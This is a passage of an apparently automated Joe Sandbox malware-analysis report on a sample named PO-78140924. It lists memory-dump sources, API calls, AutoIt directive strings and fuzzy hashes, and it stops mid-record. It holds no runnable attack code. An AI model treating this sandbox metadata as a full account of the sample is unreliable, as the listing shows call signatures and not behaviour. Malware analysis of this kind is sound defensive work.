                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Console__getptd_noexit$ByteCharModeMultiWide
                                                • String ID: Pp>
                                                • API String ID: 321029406-1895935624
                                                • Opcode ID: 83ed5dc42ad087f032e3d23ccc3e22e048f8d9f2008627afee2cd2cd43236fdc
                                                • Instruction ID: f661a845b0c38a66a89ce19644c03cbe63b5c120c4d7bf13c45769e8759ad1ce
                                                • Opcode Fuzzy Hash: 83ed5dc42ad087f032e3d23ccc3e22e048f8d9f2008627afee2cd2cd43236fdc
                                                • Instruction Fuzzy Hash: 59715A75B022188FDB25DB55EC80AE8B7F9BB06314F1441EAE40AE6A81C7759E81CF52
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?,00000000), ref: 0006DE3D
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0006DE63
                                                • SysAllocString.OLEAUT32(00000000), ref: 0006DE66
                                                • SysAllocString.OLEAUT32(?), ref: 0006DE84
                                                • SysFreeString.OLEAUT32(?), ref: 0006DE8D
                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 0006DEB2
                                                • SysAllocString.OLEAUT32(?), ref: 0006DEC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 911793ccb7e971b540574ccad5a57bad6a4924fe0f197f61b8411a81652f7a22
                                                • Instruction ID: 9a6742f1f50ba3bb84cf7863fb92f36da116590d8a6e0ae06a655e08bdbf4a76
                                                • Opcode Fuzzy Hash: 911793ccb7e971b540574ccad5a57bad6a4924fe0f197f61b8411a81652f7a22
                                                • Instruction Fuzzy Hash: D8219276B0421AAFEB60EFA8DC88CBB73EDFB19360B008526F914DF250D6759D418760
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 33aba01c4e0fb15646e40e362065cd492d98f467e08b1b4d839b3c3f476027f8
                                                • Instruction ID: bf2a248115aa74bad5ac37438de1be86c19e0284903c8b86796bc4969a58ff78
                                                • Opcode Fuzzy Hash: 33aba01c4e0fb15646e40e362065cd492d98f467e08b1b4d839b3c3f476027f8
                                                • Instruction Fuzzy Hash: 9C21FF73109512B6D231EA69BC42FFB73DDEF55310F544035F58986142E7915D82C2A6
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,00000008), ref: 0006DF18
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0006DF3E
                                                • SysAllocString.OLEAUT32(00000000), ref: 0006DF41
                                                • SysAllocString.OLEAUT32(?), ref: 0006DF62
                                                • SysFreeString.OLEAUT32(?), ref: 0006DF6B
                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 0006DF85
                                                • SysAllocString.OLEAUT32(?), ref: 0006DF93
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 7aed84525589ee5794f96e84240050ba083c115a04a2921adf93e1cac6e9b5ed
                                                • Instruction ID: 821617973f22fd8fc8bf2cd025524af0517f3c373eaf22e51b3053402308ee6c
                                                • Opcode Fuzzy Hash: 7aed84525589ee5794f96e84240050ba083c115a04a2921adf93e1cac6e9b5ed
                                                • Instruction Fuzzy Hash: 04215675B04105AFEB50AFA8DC88DBB77EDFB09360B108136F915CB261D674DC418765
                                                APIs
                                                • __init_pointers.LIBCMT ref: 00039C66
                                                  • Part of subcall function 00033307: RtlEncodePointer.NTDLL(00000000), ref: 0003330A
                                                  • Part of subcall function 00033307: __initp_misc_winsig.LIBCMT ref: 00033325
                                                  • Part of subcall function 00033307: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0003A020
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0003A034
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0003A047
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0003A05A
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0003A06D
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0003A080
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0003A093
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0003A0A6
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0003A0B9
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0003A0CC
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0003A0DF
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0003A0F2
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0003A105
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0003A118
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0003A12B
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0003A13E
                                                • __mtinitlocks.LIBCMT ref: 00039C6B
                                                • __mtterm.LIBCMT ref: 00039C74
                                                  • Part of subcall function 00039CDC: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00039DD6
                                                  • Part of subcall function 00039CDC: _free.LIBCMT ref: 00039DDD
                                                  • Part of subcall function 00039CDC: RtlDeleteCriticalSection.NTDLL(02), ref: 00039DFF
                                                • __calloc_crt.LIBCMT ref: 00039C99
                                                • __initptd.LIBCMT ref: 00039CBB
                                                • GetCurrentThreadId.KERNEL32 ref: 00039CC2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                • String ID:
                                                • API String ID: 3567560977-0
                                                • Opcode ID: af0d72053885933096d23466abd5d33dc074016cc2bba6abd314a22e2ded6932
                                                • Instruction ID: 37f281f5180a31648a13f40203ee9e5b8b1ce08aa9eb1337a985123755fa3170
                                                • Opcode Fuzzy Hash: af0d72053885933096d23466abd5d33dc074016cc2bba6abd314a22e2ded6932
                                                • Instruction Fuzzy Hash: 37F090325697521DE7777778BD076DA26CCDB01730F20062AF464C81D3EFA089414590
                                                APIs
                                                • _memset.LIBCMT ref: 0009B678
                                                • _memset.LIBCMT ref: 0009B687
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,000D6F20,000D6F64), ref: 0009B6B6
                                                • CloseHandle.KERNEL32 ref: 0009B6C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID: o$do
                                                • API String ID: 3277943733-2948190108
                                                • Opcode ID: 645aee4ee77ae7574405bdfa5d95d404363fe99de61c2ee055316a4fcddb71f6
                                                • Instruction ID: c3de559c82d459ec0cd76820bed9a943a80824cf32c24bc72756e812b2615653
                                                • Opcode Fuzzy Hash: 645aee4ee77ae7574405bdfa5d95d404363fe99de61c2ee055316a4fcddb71f6
                                                • Instruction Fuzzy Hash: 60F0DAB2641704BAF6102765BC46FBB7A9CEB09754F004036FA09D51A6D77A5C1087B8
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,000340BB,00000000), ref: 00034123
                                                • GetProcAddress.KERNEL32(00000000), ref: 0003412A
                                                • RtlEncodePointer.NTDLL(00000000), ref: 00034136
                                                • RtlDecodePointer.NTDLL(00000001), ref: 00034153
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoInitialize$combase.dll
                                                • API String ID: 3489934621-340411864
                                                • Opcode ID: 72e909e6cf94d0ddf2c569dc8c5f05f057bc416afac3b346042996aca8c9bf45
                                                • Instruction ID: 853a1275e9da4c017170303a8b8dae4ac7d2a00f1e63b10176e729f226fe83d9
                                                • Opcode Fuzzy Hash: 72e909e6cf94d0ddf2c569dc8c5f05f057bc416afac3b346042996aca8c9bf45
                                                • Instruction Fuzzy Hash: 39E01A78692302AEFB506F75FC09B243BA8B716B02F508436B901D90A0CBBD92808F11
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000340F8), ref: 000341F8
                                                • GetProcAddress.KERNEL32(00000000), ref: 000341FF
                                                • RtlEncodePointer.NTDLL(00000000), ref: 0003420A
                                                • RtlDecodePointer.NTDLL(000340F8), ref: 00034225
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoUninitialize$combase.dll
                                                • API String ID: 3489934621-2819208100
                                                • Opcode ID: e30bc7bdffe54bf2d42253281d88f405655b7b77c310950bd73a34f322bfe687
                                                • Instruction ID: 4ad7924e4df9effb853f696ea0774f626ffe3159268809055164af997d0dfef6
                                                • Opcode Fuzzy Hash: e30bc7bdffe54bf2d42253281d88f405655b7b77c310950bd73a34f322bfe687
                                                • Instruction Fuzzy Hash: BBE0B674582303ABFB509B61ED0DB153BA8B704742F504436F911F90A1CBBE9600CB21
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 00011DDC
                                                • GetWindowRect.USER32(?,?), ref: 00011E1D
                                                • ScreenToClient.USER32(?,?), ref: 00011E45
                                                • GetClientRect.USER32(?,?), ref: 00011F74
                                                • GetWindowRect.USER32(?,?), ref: 00011F8D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Rect$Client$Window$Screen
                                                • String ID:
                                                • API String ID: 1296646539-0
                                                • Opcode ID: 7e4057813b34478bbf884bafb473e97212464df77a5f039690d1672d14656259
                                                • Instruction ID: ef1b5c3e77a7dda92956d0148a62df4dd3708a162390811d2825562457c95599
                                                • Opcode Fuzzy Hash: 7e4057813b34478bbf884bafb473e97212464df77a5f039690d1672d14656259
                                                • Instruction Fuzzy Hash: 85B13679A0024ADBDF54CFA8C5807EEB7F1FF08310F148569ED599B250EB70AA91CB64
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0006F218
                                                • VariantClear.OLEAUT32(00000013), ref: 0006F28A
                                                • VariantClear.OLEAUT32(00000000), ref: 0006F2E5
                                                • _memmove.LIBCMT ref: 0006F30F
                                                • VariantClear.OLEAUT32(?), ref: 0006F35C
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0006F38A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                • String ID:
                                                • API String ID: 1101466143-0
                                                • Opcode ID: 815d77393f05553393224dbb05de87f8aa4c0b0d95ced7384a334d2a86611d2d
                                                • Instruction ID: 029d4546dc4f551ea8004783a9c5c80901bf53248308dd99fa8daac0509891e9
                                                • Opcode Fuzzy Hash: 815d77393f05553393224dbb05de87f8aa4c0b0d95ced7384a334d2a86611d2d
                                                • Instruction Fuzzy Hash: 66514CB5A0021AAFDB14CF58D884AAAB7F9FF4C314B158569E959DB301D334EA11CFA0
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • BeginPaint.USER32(?,?,?), ref: 0001179A
                                                • GetWindowRect.USER32(?,?), ref: 000117FE
                                                • ScreenToClient.USER32(?,?), ref: 0001181B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0001182C
                                                • EndPaint.USER32(?,?,?,?,?), ref: 00011876
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0004B9FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                • String ID:
                                                • API String ID: 2592858361-0
                                                • Opcode ID: 20871b969f81462d541088666b3241eae758950f46bb3e1f2d7d9e1ef03ce55f
                                                • Instruction ID: 1a24acbdfee68c3c0e670f27ba5b40863af0d4c038a4b7d717c6e7a161220332
                                                • Opcode Fuzzy Hash: 20871b969f81462d541088666b3241eae758950f46bb3e1f2d7d9e1ef03ce55f
                                                • Instruction Fuzzy Hash: EC41A0701047019FD710DF25DC84FFA7BE8FB49725F14462AFAA4872A2CB349885DB61
                                                APIs
                                                • ShowWindow.USER32(000D57B0,00000000,01463B38,?,?,000D57B0,?,0009B5DC,?,?), ref: 0009B746
                                                • EnableWindow.USER32(?,00000000), ref: 0009B76A
                                                • ShowWindow.USER32(000D57B0,00000000,01463B38,?,?,000D57B0,?,0009B5DC,?,?), ref: 0009B7CA
                                                • ShowWindow.USER32(?,00000004,?,0009B5DC,?,?), ref: 0009B7DC
                                                • EnableWindow.USER32(?,00000001), ref: 0009B800
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0009B823
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: fa9a35112ce86356d41ee1fc6e4e79da1225aeee15cdf1e669acd033eeb80df7
                                                • Instruction ID: 17373f6d1fa50e79b0b68a89e99b9a5dea20168eed9fd5d6100fe3da9e642f0e
                                                • Opcode Fuzzy Hash: fa9a35112ce86356d41ee1fc6e4e79da1225aeee15cdf1e669acd033eeb80df7
                                                • Instruction Fuzzy Hash: 9341A134608141EFDF61CF64D5C9BE1BBE1FB49320F1842B9E9488F2A2CB31A845DB50
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,000488B4,?,?), ref: 00049AF4
                                                • __calloc_crt.LIBCMT ref: 00049B03
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0145A0C0,000000FF,00000000,00000000,00000000,00000000,?,?,000488B4,?,?,?,0004414C,000AE500), ref: 00049B1F
                                                • ___crtsetenv.LIBCMT ref: 00049B2E
                                                • _free.LIBCMT ref: 00049B41
                                                • _free.LIBCMT ref: 00049B5C
                                                  • Part of subcall function 00032ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00039BA4,00000000,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?), ref: 00032EE9
                                                  • Part of subcall function 00032ED5: GetLastError.KERNEL32(00000000,?,00039BA4,00000000,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?), ref: 00032EFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapLast___crtsetenv__calloc_crt
                                                • String ID:
                                                • API String ID: 3554878821-0
                                                • Opcode ID: e8165aacdf51356e832ffaa90ee9cbe82e9e2ab71cec88ff153843a841aa55f9
                                                • Instruction ID: 5191aacb733bea504dc276fcc60bbccd9d4368eea46f3d2cc4971089f9a73676
                                                • Opcode Fuzzy Hash: e8165aacdf51356e832ffaa90ee9cbe82e9e2ab71cec88ff153843a841aa55f9
                                                • Instruction Fuzzy Hash: 97118671505105BAEB219A56AD05E6BBBBCDBC3B30F30427EF410D21D1DB719D00A665
                                                APIs
                                                  • Part of subcall function 000112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0001134D
                                                  • Part of subcall function 000112F3: SelectObject.GDI32(?,00000000), ref: 0001135C
                                                  • Part of subcall function 000112F3: BeginPath.GDI32(?), ref: 00011373
                                                  • Part of subcall function 000112F3: SelectObject.GDI32(?,00000000), ref: 0001139C
                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0009BF3E
                                                • LineTo.GDI32(00000000,00000003,?), ref: 0009BF52
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0009BF60
                                                • LineTo.GDI32(00000000,00000000,?), ref: 0009BF70
                                                • EndPath.GDI32(00000000), ref: 0009BF80
                                                • StrokePath.GDI32(00000000), ref: 0009BF90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                • String ID:
